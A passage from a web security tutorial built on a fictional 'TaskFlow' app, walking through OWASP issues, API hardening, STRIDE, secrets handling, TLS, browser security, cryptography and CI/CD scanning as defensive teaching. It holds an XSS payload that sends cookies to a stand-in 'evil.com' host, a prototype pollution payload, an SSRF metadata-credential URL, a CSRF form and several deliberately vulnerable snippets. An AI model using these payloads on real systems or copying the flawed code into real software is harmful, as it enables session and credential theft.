const container = document.getElementById('container');
const div = document.createElement('div');
div.className = 'task';
div.textContent = task.title; // Safe
container.appendChild(div);
}
// When you need to allow some HTML (e.g., rich text), sanitize first:
import DOMPurify from 'dompurify';
function renderDescription(html) {
return DOMPurify.sanitize(html, {
ALLOWED_TAGS: ['b', 'i', 'em', 'strong', 'a', 'p', 'ul', 'li'],
ALLOWED_ATTR: ['href'],
});
}
A04 — Insecure Design
Security flaws baked into the design that middleware can't patch. Example: no rate limiting on password reset lets an attacker spam any inbox.
# INSECURE DESIGN: new password in URL (visible in logs, referrer headers, history)
def reset_password_bad(email: str):
new_password = secrets.token_urlsafe(12)
db.users.update_password(email, hash_password(new_password))
send_email(email, f"Your new password: https://taskflow.app/login?pass={new_password}")
# INSECURE DESIGN: no rate limiting on password reset
@app.route("/forgot-password", methods=["POST"])
def forgot_password_bad():
send_reset_email(request.json["email"]) # No rate limiting!
# SECURE DESIGN: time-limited token, rate-limited, invalidated after use
from flask_limiter import Limiter
limiter = Limiter(key_func=lambda: request.remote_addr)
@app.route("/forgot-password", methods=["POST"])
@limiter.limit("3 per hour")
def forgot_password():
email = request.json.get("email", "")
user = db.users.find_by_email(email)
if user:
token = secrets.token_urlsafe(32)
redis.setex(f"reset:{token}", 900, user.id) # 15 min TTL
send_email(email, f"Reset link (expires in 15 min): https://taskflow.app/reset?token={token}")
return jsonify({"message": "If that email exists, you'll receive a reset link."})
A05 — Security Misconfiguration
Debug mode in production, default credentials, verbose error messages leaking internals, unnecessary services exposed.
# VULNERABLE: debug mode in production exposes interactive debugger (instant RCE)
app.run(debug=True)
# VULNERABLE: stack traces in API responses
@app.errorhandler(Exception)
def handle_error(e):
return jsonify({"error": str(e), "traceback": traceback.format_exc()}), 500
# FIXED: environment-specific config, generic errors for users
DEBUG = os.environ.get("FLASK_DEBUG", "0") == "1"
app.run(debug=DEBUG)
@app.errorhandler(Exception)
def handle_error(e):
app.logger.error(f"Unhandled exception: {e}", exc_info=True) # Log detail internally
if DEBUG:
return jsonify({"error": str(e)}), 500
return jsonify({"error": "Internal server error"}), 500 # Generic for users
A06 — Vulnerable and Outdated Components
Using libraries with known CVEs. The Log4Shell vulnerability (2021) put billions of devices running Java at risk. Lodash prototype pollution (2019) hit millions of JavaScript projects.
// VULNERABLE: lodash 4.17.4 with prototype pollution (CVE-2019-10744)
const _ = require('lodash');
const userData = JSON.parse(userInput);
// Attacker sends: {"__proto__": {"isAdmin": true}}
_.merge({}, userData);
console.log({}.isAdmin); // true — entire process polluted!
// FIXED: update to lodash 4.17.21+, validate input, use Object.create(null) for untrusted merges
# Dependency scanning in CI/CD
npm audit --audit-level=high || exit 1
pip-audit || exit 1
trivy fs . --scanners vuln --exit-code 1 --severity HIGH,CRITICAL
A07 — Identification and Authentication Failures
No brute-force protection, weak passwords accepted, credentials stuffed from breach databases, session IDs not rotated post-login.
// Brute-force protection: exponential backoff per account
// WARNING: In-memory counters don't work in multi-instance deployments.
// For production, use Redis-backed rate limiting (see Section 9).
type LoginAttempts struct {
	mu       sync.Mutex
	counts   map[string]int
	lastFail map[string]time.Time // Enables periodic cleanup of stale entries (not shown)
}
func NewLoginAttempts() *LoginAttempts {
	return &LoginAttempts{counts: map[string]int{}, lastFail: map[string]time.Time{}}
}
func (la *LoginAttempts) Delay(email string) time.Duration {
la.mu.Lock()
defer la.mu.Unlock()
n := la.counts[email]
if n == 0 {
return 0
}
	// 0, 1s, 2s, 4s, 8s, 16s... capped at 30s
	if n > 6 {
		n = 6 // Cap the shift so it can't overflow for large failure counts
	}
	delay := time.Duration(min(1<<uint(n-1), 30)) * time.Second
	return delay
}
func (la *LoginAttempts) Record(email string, success bool) {
la.mu.Lock()
defer la.mu.Unlock()
if success {
delete(la.counts, email)
} else {
la.counts[email]++
la.lastFail[email] = time.Now()
}
}
A08 — Software and Data Integrity Failures
Unverified CI/CD actions, unsigned artifacts, deserialization of untrusted data.
# VULNERABLE: unpinned actions can be hijacked via tag mutation
- uses: actions/checkout@main
- uses: actions/setup-python@v4
# FIXED: pin to immutable commit SHA
- uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2
- uses: actions/setup-python@a26af69be951a213d495a4c3e4e4022e16d87065 # v5.6.0
# Scan container images for vulnerabilities before pushing
- name: Scan image
run: trivy image --exit-code 1 --severity CRITICAL ghcr.io/taskflow/api:$GITHUB_SHA
A09 — Security Logging and Monitoring Failures
Attacks succeed but go undetected. When a breach is discovered, there's no audit trail to determine blast radius.
import hashlib
import structlog
from datetime import datetime, timezone
audit_log = structlog.get_logger("audit")
# Log security-relevant events with structured fields
def log_security_event(event: str, **kwargs):
audit_log.info(
event,
ip=request.remote_addr,
user_agent=request.headers.get("User-Agent"),
timestamp=datetime.now(timezone.utc).isoformat(),
**kwargs
)
# Events that must be logged
AUDIT_EVENTS = [
"auth.login.success", "auth.login.failure", "auth.logout",
"auth.password_change", "auth.mfa_change",
"access.denied",
"admin.user_disabled", "admin.role_changed",
"data.export", "data.bulk_delete",
]
# Example: login attempt logging
@app.route("/login", methods=["POST"])
def login():
    email = request.json.get("email", "")
user = db.users.find_by_email(email)
if not user or not verify_password(request.json.get("password"), user.password_hash):
log_security_event("auth.login.failure", email_hash=hashlib.sha256(email.encode()).hexdigest()[:12])
return jsonify({"error": "Invalid credentials"}), 401
log_security_event("auth.login.success", user_id=user.id,
email_hash=hashlib.sha256(email.encode()).hexdigest()[:12])
return jsonify(issue_token_pair(user.id))
A10 — Server-Side Request Forgery (SSRF)
TaskFlow adds a "preview URL" feature. An attacker pastes http://169.254.169.254/latest/meta-data/iam/security-credentials/ — the AWS instance metadata endpoint — and steals IAM credentials.
Important limitation: DNS-based validation alone is vulnerable to TOCTOU attacks (an attacker changes DNS between the check and the fetch). Production SSRF protection requires a dedicated egress proxy with network-level controls. The pattern below is defense-in-depth, not a complete solution.
import ipaddress
import socket
import httpx
from urllib.parse import urlparse
BLOCKED_NETWORKS = [
ipaddress.ip_network("169.254.0.0/16"), # AWS/GCP metadata service
ipaddress.ip_network("10.0.0.0/8"), # RFC 1918 private
ipaddress.ip_network("172.16.0.0/12"), # RFC 1918 private
ipaddress.ip_network("192.168.0.0/16"), # RFC 1918 private
ipaddress.ip_network("127.0.0.0/8"), # Loopback
]
def is_safe_url(url: str) -> bool:
try:
parsed = urlparse(url)
if parsed.scheme not in {"http", "https"}:
return False
if not parsed.hostname:
return False
# Resolve hostname and check against blocked networks.
# WARNING: DNS TOCTOU — attacker can return a safe IP here, then switch
# DNS to an internal address before the actual httpx.get() below.
# True protection requires a dedicated egress proxy with network-level controls.
ip = ipaddress.ip_address(socket.gethostbyname(parsed.hostname))
return not any(ip in net for net in BLOCKED_NETWORKS)
except Exception:
return False
@app.route("/preview", methods=["POST"])
def preview_url():
url = request.json.get("url", "")
if not is_safe_url(url):
return jsonify({"error": "URL not allowed"}), 400
# Use dedicated outbound proxy with no internal network access
response = httpx.get(url, timeout=5.0, follow_redirects=False)
return jsonify({"title": extract_og_title(response.text)})
9. API Security
TaskFlow opens a public API. Within a week, a poorly-written integration hammers it with 10,000 requests per minute and another developer exploits missing input validation to insert malformed data. API security isn't optional for public-facing APIs.
See also: REST API Refresher for API design patterns.
Rate Limiting
// Sliding window rate limiter middleware (Go + Redis)
type RateLimiter struct {
rdb *redis.Client
limit int
window time.Duration
}
func (rl *RateLimiter) Middleware(next http.Handler) http.Handler {
return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
key := rateLimitKey(r)
ctx := r.Context()
now := time.Now()
windowStart := now.Add(-rl.window)
pipe := rl.rdb.Pipeline()
pipe.ZRemRangeByScore(ctx, key, "0", strconv.FormatInt(windowStart.UnixMicro(), 10))
pipe.ZAdd(ctx, key, redis.Z{Score: float64(now.UnixMicro()), Member: now.UnixMicro()})
pipe.ZCard(ctx, key)
pipe.Expire(ctx, key, rl.window)
results, _ := pipe.Exec(ctx)
count := results[2].(*redis.IntCmd).Val()
remaining := int64(rl.limit) - count
w.Header().Set("X-RateLimit-Limit", strconv.Itoa(rl.limit))
w.Header().Set("X-RateLimit-Remaining", strconv.FormatInt(max(remaining, 0), 10))
if count > int64(rl.limit) {
w.Header().Set("Retry-After", strconv.Itoa(int(rl.window.Seconds())))
http.Error(w, `{"error":"rate limit exceeded"}`, http.StatusTooManyRequests)
return
}
next.ServeHTTP(w, r)
})
}
func rateLimitKey(r *http.Request) string {
if userID := getUserIDFromContext(r.Context()); userID != "" {
return "rl:user:" + userID
}
return "rl:ip:" + getClientIP(r)
}
Input Validation at the Boundary
from datetime import datetime
from pydantic import BaseModel, Field, ValidationError, field_validator
from typing import Optional
class CreateTaskRequest(BaseModel):
title: str = Field(min_length=1, max_length=500)
description: Optional[str] = Field(None, max_length=10000)
priority: str = Field(pattern="^(low|medium|high|urgent)$")
due_date: Optional[str] = None
@field_validator("title")
@classmethod
def sanitize_title(cls, v: str) -> str:
v = v.strip()
if not v:
raise ValueError("Title cannot be empty")
return v
@field_validator("due_date")
@classmethod
def validate_date(cls, v: Optional[str]) -> Optional[str]:
if v is not None:
try:
datetime.fromisoformat(v)
except ValueError:
raise ValueError("due_date must be ISO 8601 (YYYY-MM-DD)")
return v
@app.route("/tasks", methods=["POST"])
@require_auth
def create_task():
try:
body = CreateTaskRequest.model_validate(request.get_json())
except ValidationError as e:
return jsonify({"error": "Validation failed", "details": e.errors()}), 422
task = db.tasks.create(**body.model_dump(), creator_id=get_current_user_id())
return jsonify(task_to_dict(task)), 201
CORS Configuration
func CORSMiddleware(allowedOrigins []string) func(http.Handler) http.Handler {
allowed := make(map[string]bool)
for _, o := range allowedOrigins {
allowed[o] = true
}
return func(next http.Handler) http.Handler {
return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
origin := r.Header.Get("Origin")
if allowed[origin] {
w.Header().Set("Access-Control-Allow-Origin", origin) // Not *
w.Header().Set("Access-Control-Allow-Credentials", "true")
w.Header().Set("Vary", "Origin")
}
if r.Method == http.MethodOptions {
w.Header().Set("Access-Control-Allow-Methods", "GET,POST,PUT,PATCH,DELETE")
w.Header().Set("Access-Control-Allow-Headers", "Content-Type,Authorization")
w.Header().Set("Access-Control-Max-Age", "3600")
w.WriteHeader(http.StatusNoContent)
return
}
next.ServeHTTP(w, r)
})
}
}
Webhook Signature Verification
import hmac, hashlib
def verify_webhook(payload: bytes, signature: str, secret: str) -> bool:
expected = "sha256=" + hmac.new(
secret.encode(), payload, hashlib.sha256
).hexdigest()
return hmac.compare_digest(expected, signature) # Constant-time comparison
# Production webhook verification should also validate timestamps:
# 1. Parse timestamp from header (e.g., Stripe: "t=TIMESTAMP,v1=SIGNATURE")
# 2. Reject if abs(now - timestamp) > 300 seconds (replay protection)
# 3. Include timestamp in HMAC computation
# For Stripe specifically, use: stripe.Webhook.construct_event(payload, sig, secret)
@app.route("/webhooks/stripe", methods=["POST"])
def stripe_webhook():
payload = request.get_data() # Raw bytes before JSON parsing
sig = request.headers.get("Stripe-Signature", "")
if not verify_webhook(payload, sig, os.environ["STRIPE_WEBHOOK_SECRET"]):
return jsonify({"error": "Invalid signature"}), 401
handle_stripe_event(json.loads(payload))
return jsonify({"ok": True})
10. Threat Modeling with STRIDE
Before building TaskFlow's payment feature, the tech lead calls a 30-minute threat modeling session. The goal isn't a perfect threat model — it's finding the big risks before writing code, not after a breach.
Step 1 — Draw the Data Flow Diagram
Step 2 — Apply STRIDE to Each Component
STRIDE is a mnemonic for threat categories. For each element in the data flow diagram, ask which STRIDE threats apply:
| Letter | Threat | Question to ask |
|---|---|---|
| S | Spoofing | Can an attacker impersonate a user or service? |
| T | Tampering | Can an attacker modify data in transit or at rest? |
| R | Repudiation | Can a user deny taking an action? |
| I | Information Disclosure | Can an attacker read data they shouldn't? |
| D | Denial of Service | Can an attacker make the system unavailable? |
| E | Elevation of Privilege | Can an attacker gain more permissions than intended? |
STRIDE Applied to TaskFlow Payment API
| Component | Threat | Attack scenario | Mitigation |
|---|---|---|---|
| API endpoint | Spoofing | Attacker sends request with forged user_id in body | Derive user identity from verified JWT, never request body |
| API endpoint | Tampering | Attacker modifies amount in flight | TLS in transit; re-derive amount from DB, not request |
| API endpoint | DoS | Bot floods payment endpoint | Rate limiting (3 per hour per user) + Cloudflare |
| Payment DB | Info Disclosure | SQL injection exposes card data | Parameterized queries; store only Stripe token, never card number |
| Payment DB | Elevation | App DB user can DROP tables | Least-privilege DB role (SELECT/INSERT/UPDATE only) |
| Audit log | Repudiation | User denies charge; no audit trail | Append-only WORM S3 bucket; log every payment attempt with user_id and IP |
| Stripe integration | Tampering | Webhook replay or forgery | Verify Stripe-Signature HMAC on every webhook |
Step 3 — Rank and Mitigate
Score each threat by likelihood × impact. Address critical ones before shipping, log the rest as accepted risk. The output isn't a 50-page document — it's a ranked list of mitigations added to the sprint backlog.
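That ranking step fits in a few lines. The scores below are made up for illustration — in practice the room argues them out — and the threat names echo the table above:

```python
# Each threat scored 1-5 for likelihood and impact; risk = likelihood * impact
threats = [
    ("Forged user_id in payment request", 4, 5),
    ("Webhook replay",                    3, 4),
    ("Payment endpoint flood (DoS)",      4, 3),
    ("App DB user can DROP tables",       2, 5),
]

ranked = sorted(
    ({"threat": t, "risk": lik * imp} for t, lik, imp in threats),
    key=lambda x: x["risk"],
    reverse=True,
)
for item in ranked:
    print(f"{item['risk']:>2}  {item['threat']}")
```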
11. Secrets Management
TaskFlow has accumulated 15 environment variables: database URL, Stripe keys, JWT secret, Sendgrid API key, Google OAuth credentials, Redis URL, Slack webhook, internal service tokens. Managing secrets incorrectly is how companies make headlines.
Maturity Levels
| Level | Approach | Appropriate for | Risk |
|---|---|---|---|
| 0 | Hardcoded in source | Never | Critical — in every git clone forever |
| 1 | .env files | Local dev only, never committed | High if committed; check .gitignore |
| 2 | Platform env vars (Railway, Heroku, Vercel) | Simple deployments | Medium — visible to all platform users on the project |
| 3 | Secrets manager (Vault, AWS SM, GCP SM) | Production, compliance | Low — audit log, rotation, fine-grained access |
# Reading secrets from AWS Secrets Manager (production pattern)
import boto3
import json
from functools import lru_cache
# WARNING: lru_cache has no TTL — cached secrets never refresh.
# For production with secret rotation, use a TTL cache:
# from cachetools import TTLCache
# _cache = TTLCache(maxsize=100, ttl=300) # 5-minute TTL
@lru_cache(maxsize=None)
def get_secret(secret_name: str) -> dict:
"""Fetch and cache secret for process lifetime."""
client = boto3.client("secretsmanager", region_name="us-east-1")
response = client.get_secret_value(SecretId=secret_name)
return json.loads(response["SecretString"])
# Usage — never hardcode the secret value
db_creds = get_secret("taskflow/prod/database")
DB_URL = f"postgresql://{db_creds['username']}:{db_creds['password']}@{db_creds['host']}/{db_creds['dbname']}"
Secret Rotation — Zero Downtime
The dual-credential pattern ensures rotation never causes downtime:
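A sketch of the consumer side of that pattern. fetch_secret and connect are stand-ins — e.g. AWS Secrets Manager version stages and your DB driver's connect call — and the database must keep both passwords valid during the rotation window:

```python
def connect_with_rotation(fetch_secret, connect):
    """Dual-credential connect: try the current secret first; if auth
    fails mid-rotation, fall back to the previous version.

    fetch_secret(stage) and connect(creds) are illustrative stand-ins.
    PermissionError stands in for the driver's auth-failure exception.
    """
    last_err = None
    for stage in ("AWSCURRENT", "AWSPREVIOUS"):
        creds = fetch_secret(stage)
        if creds is None:
            continue
        try:
            return connect(creds)
        except PermissionError as e:
            last_err = e
    raise RuntimeError("All credential versions rejected") from last_err
```

The flip side of the pattern: the old password stays valid until every client has picked up the new secret, at which point it is retired.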
Common Disasters
- Secrets in git history — git log -p | grep -i secret reveals them forever. Use a git-secrets pre-commit hook, and rotate immediately if leaked.
- Secrets in error logs — logging request headers exposes Authorization: Bearer ... tokens. Scrub headers before logging.
- Secrets in Docker images — RUN pip install -r requirements.txt --extra-index-url https://user:[email protected] bakes the token into the image layer. Use build secrets (the --secret flag) instead.
- Secrets in environment variable dumps — never expose /actuator/env or equivalent in production without auth; these endpoints dump every env var.
# Check for secrets accidentally committed to git
git log --all -p | grep -iE "(password|secret|api_key|token)\s*=\s*['\"][^'\"]{8,}"
# Install git-secrets pre-commit hook
brew install git-secrets
git secrets --install
git secrets --register-aws # Also add your own patterns
# Revoke and rotate if you find anything — then rewrite history
git filter-repo --path .env --invert-paths # Remove file from all history
# Then force-push and notify all collaborators to re-clone
12. TLS & Certificates
TaskFlow's infrastructure team asks: "Is our traffic really encrypted end-to-end?" The answer is complicated. Cloudflare terminates TLS. The connection from Cloudflare to Railway is a separate TLS session. The inter-service calls inside the cluster — are those encrypted?
See also: Networking Refresher for a deeper TCP/IP treatment.
TLS 1.3 Handshake — What Happens
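Whatever the handshake negotiates is bounded by what you configure. A minimal sketch of a hardened client-side context using Python's stdlib ssl module:

```python
import ssl

# A hardened client context: certificate and hostname verification stay on,
# and anything older than TLS 1.2 is refused outright.
ctx = ssl.create_default_context()
ctx.minimum_version = ssl.TLSVersion.TLSv1_2

# After connecting, you can inspect what was actually negotiated:
#   with ctx.wrap_socket(sock, server_hostname="taskflow.app") as tls:
#       tls.version()  # e.g. "TLSv1.3"
```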
Certificate Chain
Let's Encrypt and Auto-Renewal
# Certbot: obtain and auto-renew Let's Encrypt certificate
certbot certonly \
--webroot \
-w /var/www/html \
-d taskflow.app \
-d www.taskflow.app \
--email [email protected] \
--agree-tos \
--non-interactive
# Auto-renewal via cron (certbot renews certs expiring within 30 days)
0 0 * * * certbot renew --quiet --post-hook "nginx -s reload"
# Verify your certificate chain
openssl s_client -connect taskflow.app:443 -servername taskflow.app </dev/null | \
openssl x509 -noout -dates -subject -issuer
# Check expiry programmatically (alert if < 30 days)
EXPIRY=$(echo | openssl s_client -servername taskflow.app -connect taskflow.app:443 2>/dev/null | \
openssl x509 -noout -enddate | cut -d= -f2)
echo "Certificate expires: $EXPIRY"
Security Headers
// Go: security headers middleware
func SecurityHeaders(next http.Handler) http.Handler {
return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
h := w.Header()
// Force HTTPS for 1 year, include subdomains, preload
h.Set("Strict-Transport-Security", "max-age=31536000; includeSubDomains; preload")
// Prevent MIME sniffing
h.Set("X-Content-Type-Options", "nosniff")
// Prevent clickjacking
h.Set("X-Frame-Options", "DENY")
// Restrict referrer info
h.Set("Referrer-Policy", "strict-origin-when-cross-origin")
// Content Security Policy (start restrictive, loosen as needed)
// Generate a per-request nonce and substitute it into the CSP header.
// The {NONCE} placeholder below is NOT sent to clients — replace it
// in your template middleware before writing the response:
// nonce := base64.StdEncoding.EncodeToString(randomBytes(16))
// csp := strings.Replace(cspTemplate, "{NONCE}", nonce, -1)
h.Set("Content-Security-Policy",
"default-src 'self'; "+
"script-src 'self' 'nonce-{NONCE}'; "+
"style-src 'self' 'unsafe-inline' fonts.googleapis.com; "+
"font-src fonts.gstatic.com; "+
"img-src 'self' data: https:; "+
"connect-src 'self' https://api.taskflow.app; "+
"frame-ancestors 'none'")
next.ServeHTTP(w, r)
})
}
mTLS — Mutual TLS
Standard TLS: server proves identity to client. mTLS: both sides prove identity. Used for service-to-service authentication where you want to ensure only your own services can call each other.
# Generate client certificate for internal service auth
# For internal service certs, prefer ECDSA P-256 (faster, smaller):
# openssl ecparam -genkey -name prime256v1 -out service-a.key
# Use short lifetimes (30-90 days) with automated rotation
openssl genrsa -out service-a.key 4096 # RSA alternative
openssl req -new -key service-a.key -out service-a.csr \
-subj "/CN=service-a/O=TaskFlow/OU=Internal"
openssl x509 -req -in service-a.csr -CA internal-ca.crt -CAkey internal-ca.key \
-CAcreateserial -out service-a.crt -days 90
# Go client: present client certificate
cert, _ := tls.LoadX509KeyPair("service-a.crt", "service-a.key")
caCert, _ := os.ReadFile("internal-ca.crt")
caCertPool := x509.NewCertPool()
caCertPool.AppendCertsFromPEM(caCert)
client := &http.Client{
Transport: &http.Transport{
TLSClientConfig: &tls.Config{
Certificates: []tls.Certificate{cert},
RootCAs: caCertPool,
},
},
}
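The Go client presents its certificate; the server side must also demand one, or the TLS isn't mutual. A Python stdlib ssl sketch of the server-side requirement (file paths are illustrative):

```python
import ssl

def mtls_server_context(ca_path: str, cert_path: str, key_path: str) -> ssl.SSLContext:
    """Build a server-side context that refuses clients without a valid cert."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    ctx.verify_mode = ssl.CERT_REQUIRED        # Handshake fails if no client cert is presented
    ctx.load_verify_locations(ca_path)         # Trust only the internal CA
    ctx.load_cert_chain(cert_path, key_path)   # The server's own identity
    return ctx

# Usage (paths are illustrative):
# ctx = mtls_server_context("internal-ca.crt", "service-b.crt", "service-b.key")
```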
13. Browser Security
TaskFlow's React frontend gets a bug report: a user's account is posting tasks they never created. The culprit is stored XSS — a task title containing a script tag was rendered without sanitization, and the script exfiltrated the user's auth token.
Same-Origin Policy
The browser's foundational security model: a script from https://taskflow.app can read responses from https://taskflow.app but not from https://evil.com. Origin = scheme + hostname + port. Any difference means cross-origin.
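The comparison is mechanical — a sketch (note that a real browser also normalizes default ports, e.g. :443 for https, which this deliberately skips to keep the rule visible):

```python
from urllib.parse import urlsplit

def same_origin(a: str, b: str) -> bool:
    """Origins match iff scheme, host, and port are all identical."""
    pa, pb = urlsplit(a), urlsplit(b)
    return (pa.scheme, pa.hostname, pa.port) == (pb.scheme, pb.hostname, pb.port)

same_origin("https://taskflow.app/a", "https://taskflow.app/b")  # True — path doesn't matter
same_origin("https://taskflow.app", "https://api.taskflow.app")  # False — different host
same_origin("https://taskflow.app", "http://taskflow.app")       # False — different scheme
```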
XSS — Three Types
| Type | Where payload lives | Who gets hit |
|---|---|---|
| Stored XSS | Database (task title, comment) | Every user who views the page |
| Reflected XSS | URL parameter, search query | Anyone who clicks the crafted URL |
| DOM-based XSS | Client-side JS reads URL hash/params | Anyone who visits the crafted URL |
// DOM-based XSS example
// URL: https://taskflow.app/search#<img src=x onerror="fetch('https://evil.com?c='+document.cookie)">
const query = location.hash.slice(1);
document.getElementById('search').innerHTML = `Search: ${query}`; // VULNERABLE
// Fixed: use textContent or sanitize
document.getElementById('search').textContent = `Search: ${decodeURIComponent(query)}`;
Content Security Policy
CSP instructs the browser which sources are allowed for scripts, styles, images, etc. A strong CSP severely limits what stolen XSS can do.
## Progressive CSP deployment
## Phase 1: Report-only (learn without breaking anything)
Content-Security-Policy-Report-Only: default-src 'self'; report-uri /csp-reports
## Phase 2: Enforce with nonces (allows inline scripts you control)
Content-Security-Policy:
default-src 'self';
script-src 'self' 'nonce-RANDOM_PER_REQUEST';
style-src 'self' 'unsafe-inline';
img-src 'self' data: https:;
connect-src 'self' https://api.taskflow.app;
font-src 'self' fonts.gstatic.com;
frame-ancestors 'none';
base-uri 'self';
form-action 'self'
# Server-side: generate nonce per request
import secrets, base64
from flask import g
@app.before_request
def generate_csp_nonce():
g.csp_nonce = base64.b64encode(secrets.token_bytes(16)).decode()
@app.after_request
def add_csp_header(response):
response.headers["Content-Security-Policy"] = (
f"default-src 'self'; "
f"script-src 'self' 'nonce-{g.csp_nonce}'; "
"style-src 'self' 'unsafe-inline'; "
"frame-ancestors 'none'"
)
return response
CSRF and SameSite Cookies
# CSRF: attacker hosts evil.com with:
# <form action="https://taskflow.app/tasks/delete/42" method="POST">
# If TaskFlow uses session cookies without SameSite, the browser sends them!
# FIXED: SameSite=Strict or Lax prevents cross-site cookie sending
resp.set_cookie(
"sid",
session_id,
httponly=True,
secure=True,
samesite="Strict", # Never sent on cross-site requests
# Or "Lax" — sent on top-level navigations but not subresource requests
)
Clickjacking and Subresource Integrity
<!-- Clickjacking: attacker iframes your site over a deceptive UI -->
<!-- Fix: X-Frame-Options: DENY or CSP frame-ancestors 'none' -->
<!-- Subresource Integrity: verify CDN scripts haven't been tampered with -->
<script
src="https://cdn.example.com/jquery-3.7.1.min.js"
integrity="sha384-1H217gwSVyLSIfaLxHbE7dRb3v4mYCKbpQvzx0cegeju1MVsGrX5xXxAvs/HgeFs"
crossorigin="anonymous"></script>
<!-- Generate integrity hash -->
<!-- openssl dgst -sha384 -binary jquery.min.js | openssl base64 -A -->
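The same integrity value can be computed in Python, which is handy in a build script (equivalent to the openssl pipeline in the comment above):

```python
import base64, hashlib

def sri_hash(data: bytes) -> str:
    """Compute a Subresource Integrity value for a script or stylesheet."""
    return "sha384-" + base64.b64encode(hashlib.sha384(data).digest()).decode()

# sri_hash(open("jquery-3.7.1.min.js", "rb").read())  -> "sha384-..."
```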
14. Cryptography Essentials
TaskFlow needs to store passwords, sign tokens, and encrypt sensitive task attachments. The golden rule of applied cryptography: don't implement algorithms yourself, use battle-tested libraries. But you do need to choose the right algorithm for each use case.
Password Hashing — Never SHA-256
SHA-256 is a general-purpose hash — fast by design. An attacker with a GPU can compute billions of SHA-256 hashes per second. Password hashing algorithms are intentionally slow and memory-hard, making brute force infeasible.
| Algorithm | Memory-hard | Recommended work factor | Use |
|---|---|---|---|
| bcrypt | No | rounds=12 (~250ms) | Default choice, widely supported |
| scrypt | Yes | N=32768, r=8, p=1 | Better GPU resistance |
| argon2id | Yes | m=65536, t=3, p=4 | Best current choice (OWASP recommendation) |
from argon2 import PasswordHasher
from argon2.exceptions import VerifyMismatchError
ph = PasswordHasher(
time_cost=3, # Number of iterations
memory_cost=65536, # 64 MB
parallelism=4,
hash_len=32,
salt_len=16,
)
def hash_password(password: str) -> str:
return ph.hash(password)
def verify_password(password: str, stored_hash: str) -> bool:
try:
ph.verify(stored_hash, password)
# Re-hash if parameters changed (transparent upgrade)
if ph.check_needs_rehash(stored_hash):
new_hash = ph.hash(password)
db.users.update_password_hash(new_hash)
return True
except VerifyMismatchError:
return False
Symmetric Encryption — AES-256-GCM
from cryptography.hazmat.primitives.ciphers.aead import AESGCM
import os
def encrypt_data(plaintext: bytes, key: bytes) -> bytes:
"""Encrypt with AES-256-GCM. Returns nonce + ciphertext + tag."""
nonce = os.urandom(12) # 96-bit nonce, unique per encryption
aesgcm = AESGCM(key) # key must be 32 bytes for AES-256
ciphertext = aesgcm.encrypt(nonce, plaintext, associated_data=None)
return nonce + ciphertext # Prepend nonce for storage
def decrypt_data(blob: bytes, key: bytes) -> bytes:
"""Decrypt. Raises InvalidTag if tampered."""
nonce = blob[:12]
ciphertext = blob[12:]
aesgcm = AESGCM(key)
return aesgcm.decrypt(nonce, ciphertext, associated_data=None)
# GCM mode provides authentication — detects tampering automatically
# Derive encryption key from master secret using HKDF
from cryptography.hazmat.primitives.kdf.hkdf import HKDF
from cryptography.hazmat.primitives import hashes
def derive_key(master_secret: bytes, context: str) -> bytes:
hkdf = HKDF(
algorithm=hashes.SHA256(),
length=32,
salt=b"taskflow-key-derivation-v1", # Fixed application salt
info=context.encode(),
)
return hkdf.derive(master_secret)
# Usage
master = os.environ["MASTER_ENCRYPTION_KEY"].encode()
attachment_key = derive_key(master, "taskflow/attachments/v1")
encrypted = encrypt_data(file_bytes, attachment_key)
Asymmetric — RSA vs ECDSA
| Algorithm | Key sizes (comparable security) | Use case |
|---|---|---|
| RSA-2048 | 2048 bits | TLS, JWT RS256, widely compatible |
| RSA-4096 | 4096 bits | Long-term signing, code signing |
| ECDSA P-256 | 256 bits (equivalent to RSA-3072) | JWT ES256, TLS — smaller keys, faster |
| Ed25519 | 256 bits | SSH keys, modern signing — fastest, smallest |
from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PrivateKey
from cryptography.hazmat.primitives.serialization import (
Encoding, PublicFormat, PrivateFormat, NoEncryption
)
# Generate Ed25519 key pair for signing webhooks
private_key = Ed25519PrivateKey.generate()
public_key = private_key.public_key()
# Sign a message
signature = private_key.sign(message_bytes)
# Verify (recipients only need public key)
try:
public_key.verify(signature, message_bytes)
print("Signature valid")
except Exception:
print("Signature invalid or tampered")
15. Security in CI/CD
TaskFlow's CI/CD pipeline runs tests, builds Docker images, and deploys to production on every merge to main. The pipeline is privileged — it has cloud credentials, database access, and the ability to push container images. An attacker who compromises the pipeline has compromised everything.
Dependency Scanning
# .github/workflows/security.yml
name: Security Scan
on: [push, pull_request]
jobs:
scan:
runs-on: ubuntu-latest
permissions:
security-events: write # Required for SARIF upload
contents: read
steps:
- uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683
# Python dependency audit
- name: pip-audit
run: |
pip install pip-audit
          pip-audit --strict -f json -o pip-audit-results.json || true
# Node dependency audit
- name: npm audit
run: npm audit --audit-level=high --json > npm-audit-results.json || true
# Trivy: filesystem scan for all ecosystems
- name: Trivy filesystem scan
uses: aquasecurity/trivy-action@a20de5420d57c4102486cdd9349b532415aa020d
with:
scan-type: fs
scan-ref: .
exit-code: 1
severity: CRITICAL,HIGH
format: sarif
output: trivy-results.sarif
# Container image scan
- name: Trivy image scan
uses: aquasecurity/trivy-action@a20de5420d57c4102486cdd9349b532415aa020d
with:
image-ref: ghcr.io/taskflow/api:${{ github.sha }}
exit-code: 1
severity: CRITICAL
SAST — Static Analysis
# Semgrep: SAST rules for common vulnerabilities
- name: Semgrep
uses: semgrep/semgrep-action@v1
with:
config: |
p/python
p/django
p/jwt
p/secrets
auditOn: push
# CodeQL: GitHub's SAST (deeper analysis, slower)
- name: Initialize CodeQL
uses: github/codeql-action/init@v3
with:
languages: python, javascript
- name: Perform CodeQL Analysis
uses: github/codeql-action/analyze@v3
with:
category: "/language:python"
Secret Scanning
# Pre-commit hook to block secrets from being committed
pip install detect-secrets
detect-secrets scan > .secrets.baseline
# Add to .pre-commit-config.yaml:
# - repo: https://github.com/Yelp/detect-secrets
# hooks:
# - id: detect-secrets
# args: ['--baseline', '.secrets.baseline']
# Gitleaks: scan repo history for secrets
docker run --rm -v $(pwd):/repo \
zricethezav/gitleaks:latest detect \
--source=/repo \
--report-format=json \
--report-path=/repo/gitleaks-report.json
# If secrets are found in history, rotate immediately, then:
git filter-repo --path .env --invert-paths --force
